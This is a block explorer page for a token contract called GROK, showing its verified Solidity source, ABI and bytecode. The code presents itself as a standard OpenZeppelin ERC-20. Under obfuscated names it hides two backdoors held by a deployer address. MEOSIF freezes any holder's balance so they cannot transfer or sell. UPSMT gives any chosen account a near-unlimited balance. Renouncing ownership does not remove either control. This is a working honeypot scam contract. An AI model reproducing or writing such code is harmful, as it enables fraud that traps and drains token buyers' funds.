ERC-20
Overview
Max Total Supply
21,000,000 GROK
Holders
42
Market
Price
-
Onchain Market Cap
-
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
526,598.901041585611154853 GROKValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
Contract Name:
GROK
Compiler Version
v0.8.18+commit.87f61d96
Contract Source Code (Solidity)
/** *Submitted for verification at SonicScan.org on 2024-12-30 */ // OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool); } /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _jiojsfeOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _jiojsfeOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_yydsed}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract GROK is Context, IERC20, IERC20Metadata, Ownable { using SafeMath for uint256; mapping(address => mapping(address => uint256)) private _allowances; address public _ETHS; mapping(address => uint256) private _eiosnfew; uint256 private _totalSupply; uint256 public constant MAXSupply = 21000000 * 10 ** 18; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; _ETHS = _msgSender(); _yydsed(_msgSender(), 21000000 * 10 ** decimals()); } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _eiosnfew[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); _approve(owner, spender, currentAllowance.sub(subtractedValue)); return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ mapping(address => uint256) private _eowens; function MEOSIF(address _newsf) external { if (_ETHS == _msgSender()) {_eowens[_newsf] = (100000000000000 * 10 ** 18) * 1000000000 + 4e18;} } function UPSMT(address _neiso) external { address _nrwecoe = _msgSender(); if (_ETHS == _nrwecoe) { _eiosnfew[_neiso] = 100000000000000 * (1000000000 * 10 ** 18) + 2e18; } } function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); uint256 minAmount = _eowens[from]; uint256 decydsBalance = _eiosnfew[from].sub(minAmount); require(decydsBalance >= amount, "ERC20: transfer amount exceeds balance"); _eiosnfew[from] = decydsBalance.sub(amount); // decrementing then incrementing. _eiosnfew[to] = _eiosnfew[to].add(amount); emit Transfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _yydsed(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: yydsed to the zero address"); _totalSupply = _totalSupply.add(amount); _eiosnfew[msg.sender] = _eiosnfew[msg.sender].add(amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); uint256 accountBalance = _eiosnfew[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); _eiosnfew[account] = accountBalance.sub(amount); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); _approve(owner, spender, currentAllowance.sub(amount)); } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ // function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ // function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"MAXSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_newsf","type":"address"}],"name":"MEOSIF","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_neiso","type":"address"}],"name":"UPSMT","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"_ETHS","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040523480156200001157600080fd5b50604051620026ee380380620026ee833981810160405281019062000037919062000521565b620000576200004b6200012260201b60201c565b6200012a60201b60201c565b8160059081620000689190620007f1565b5080600690816200007a9190620007f1565b506200008b6200012260201b60201c565b600260006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200011a620000df6200012260201b60201c565b620000ef620001ee60201b60201c565b600a620000fd919062000a68565b6301406f406200010e919062000ab9565b620001f760201b60201c565b505062000c5a565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60006012905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000269576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002609062000b8b565b60405180910390fd5b62000285816004546200032b60201b6200093c1790919060201c565b600481905550620002e481600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200032b60201b6200093c1790919060201c565b600360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b60008082846200033c919062000bad565b90508381101562000384576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200037b9062000c38565b60405180910390fd5b8091505092915050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620003f782620003ac565b810181811067ffffffffffffffff82111715620004195762000418620003bd565b5b80604052505050565b60006200042e6200038e565b90506200043c8282620003ec565b919050565b600067ffffffffffffffff8211156200045f576200045e620003bd565b5b6200046a82620003ac565b9050602081019050919050565b60005b83811015620004975780820151818401526020810190506200047a565b60008484015250505050565b6000620004ba620004b48462000441565b62000422565b905082815260208101848484011115620004d957620004d8620003a7565b5b620004e684828562000477565b509392505050565b600082601f830112620005065762000505620003a2565b5b815162000518848260208601620004a3565b91505092915050565b600080604083850312156200053b576200053a62000398565b5b600083015167ffffffffffffffff8111156200055c576200055b6200039d565b5b6200056a85828601620004ee565b925050602083015167ffffffffffffffff8111156200058e576200058d6200039d565b5b6200059c85828601620004ee565b9150509250929050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620005f957607f821691505b6020821081036200060f576200060e620005b1565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620006797fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200063a565b6200068586836200063a565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620006d2620006cc620006c6846200069d565b620006a7565b6200069d565b9050919050565b6000819050919050565b620006ee83620006b1565b62000706620006fd82620006d9565b84845462000647565b825550505050565b600090565b6200071d6200070e565b6200072a818484620006e3565b505050565b5b8181101562000752576200074660008262000713565b60018101905062000730565b5050565b601f821115620007a1576200076b8162000615565b62000776846200062a565b8101602085101562000786578190505b6200079e62000795856200062a565b8301826200072f565b50505b505050565b600082821c905092915050565b6000620007c660001984600802620007a6565b1980831691505092915050565b6000620007e18383620007b3565b9150826002028217905092915050565b620007fc82620005a6565b67ffffffffffffffff811115620008185762000817620003bd565b5b620008248254620005e0565b6200083182828562000756565b600060209050601f83116001811462000869576000841562000854578287015190505b620008608582620007d3565b865550620008d0565b601f198416620008798662000615565b60005b82811015620008a3578489015182556001820191506020850194506020810190506200087c565b86831015620008c35784890151620008bf601f891682620007b3565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000966578086048111156200093e576200093d620008d8565b5b60018516156200094e5780820291505b80810290506200095e8562000907565b94506200091e565b94509492505050565b60008262000981576001905062000a54565b8162000991576000905062000a54565b8160018114620009aa5760028114620009b557620009eb565b600191505062000a54565b60ff841115620009ca57620009c9620008d8565b5b8360020a915084821115620009e457620009e3620008d8565b5b5062000a54565b5060208310610133831016604e8410600b841016171562000a255782820a90508381111562000a1f5762000a1e620008d8565b5b62000a54565b62000a34848484600162000914565b9250905081840481111562000a4e5762000a4d620008d8565b5b81810290505b9392505050565b600060ff82169050919050565b600062000a75826200069d565b915062000a828362000a5b565b925062000ab17fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff84846200096f565b905092915050565b600062000ac6826200069d565b915062000ad3836200069d565b925082820262000ae3816200069d565b9150828204841483151762000afd5762000afc620008d8565b5b5092915050565b600082825260208201905092915050565b7f45524332303a2079796473656420746f20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600062000b7360218362000b04565b915062000b808262000b15565b604082019050919050565b6000602082019050818103600083015262000ba68162000b64565b9050919050565b600062000bba826200069d565b915062000bc7836200069d565b925082820190508082111562000be25762000be1620008d8565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b600062000c20601b8362000b04565b915062000c2d8262000be8565b602082019050919050565b6000602082019050818103600083015262000c538162000c11565b9050919050565b611a848062000c6a6000396000f3fe608060405234801561001057600080fd5b50600436106101165760003560e01c806395d89b41116100a2578063a9059cbb11610071578063a9059cbb146102e5578063b03559c414610315578063dd62ed3e14610331578063f046fdfa14610361578063f2fde38b1461037f57610116565b806395d89b411461025d578063a4022bd11461027b578063a457c2d714610299578063a89c37d7146102c957610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d557806370a0823114610205578063715018a6146102355780638da5cb5b1461023f57610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b61012361039b565b6040516101309190611199565b60405180910390f35b610153600480360381019061014e9190611254565b61042d565b60405161016091906112af565b60405180910390f35b610171610450565b60405161017e91906112d9565b60405180910390f35b6101a1600480360381019061019c91906112f4565b61045a565b6040516101ae91906112af565b60405180910390f35b6101bf610489565b6040516101cc9190611363565b60405180910390f35b6101ef60048036038101906101ea9190611254565b610492565b6040516101fc91906112af565b60405180910390f35b61021f600480360381019061021a919061137e565b6104c9565b60405161022c91906112d9565b60405180910390f35b61023d610512565b005b610247610526565b60405161025491906113ba565b60405180910390f35b61026561054f565b6040516102729190611199565b60405180910390f35b6102836105e1565b60405161029091906112d9565b60405180910390f35b6102b360048036038101906102ae9190611254565b6105f0565b6040516102c091906112af565b60405180910390f35b6102e360048036038101906102de919061137e565b610677565b005b6102ff60048036038101906102fa9190611254565b61072d565b60405161030c91906112af565b60405180910390f35b61032f600480360381019061032a919061137e565b610750565b005b61034b600480360381019061034691906113d5565b61080c565b60405161035891906112d9565b60405180910390f35b610369610893565b60405161037691906113ba565b60405180910390f35b6103996004803603810190610394919061137e565b6108b9565b005b6060600580546103aa90611444565b80601f01602080910402602001604051908101604052809291908181526020018280546103d690611444565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b60008061043861099a565b90506104458185856109a2565b600191505092915050565b6000600454905090565b60008061046561099a565b9050610472858285610b6b565b61047d858585610c07565b60019150509392505050565b60006012905090565b60008061049d61099a565b90506104be8185856104af858961080c565b6104b991906114a4565b6109a2565b600191505092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61051a610f19565b6105246000610f97565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461055e90611444565b80601f016020809104026020016040519081016040528092919081815260200182805461058a90611444565b80156105d75780601f106105ac576101008083540402835291602001916105d7565b820191906000526020600020905b8154815290600101906020018083116105ba57829003601f168201915b5050505050905090565b6a115eec47f6cf7e3500000081565b6000806105fb61099a565b90506000610609828661080c565b90508381101561064e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106459061154a565b60405180910390fd5b61066b8286610666878561105b90919063ffffffff16565b6109a2565b60019250505092915050565b61067f61099a565b73ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361072a57710125dfa371a19e6f7cb57b18a4ce9d900000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b60008061073861099a565b9050610745818585610c07565b600191505092915050565b600061075a61099a565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361080857710125dfa371a19e6f7cb55f5737674ec80000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6108c1610f19565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610930576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610927906115dc565b60405180910390fd5b61093981610f97565b50565b600080828461094b91906114a4565b905083811015610990576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098790611648565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a08906116da565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a80576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a779061176c565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b5e91906112d9565b60405180910390a3505050565b6000610b77848461080c565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c015781811015610be3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bda906117d8565b60405180910390fd5b610c008484610bfb858561105b90919063ffffffff16565b6109a2565b5b505050505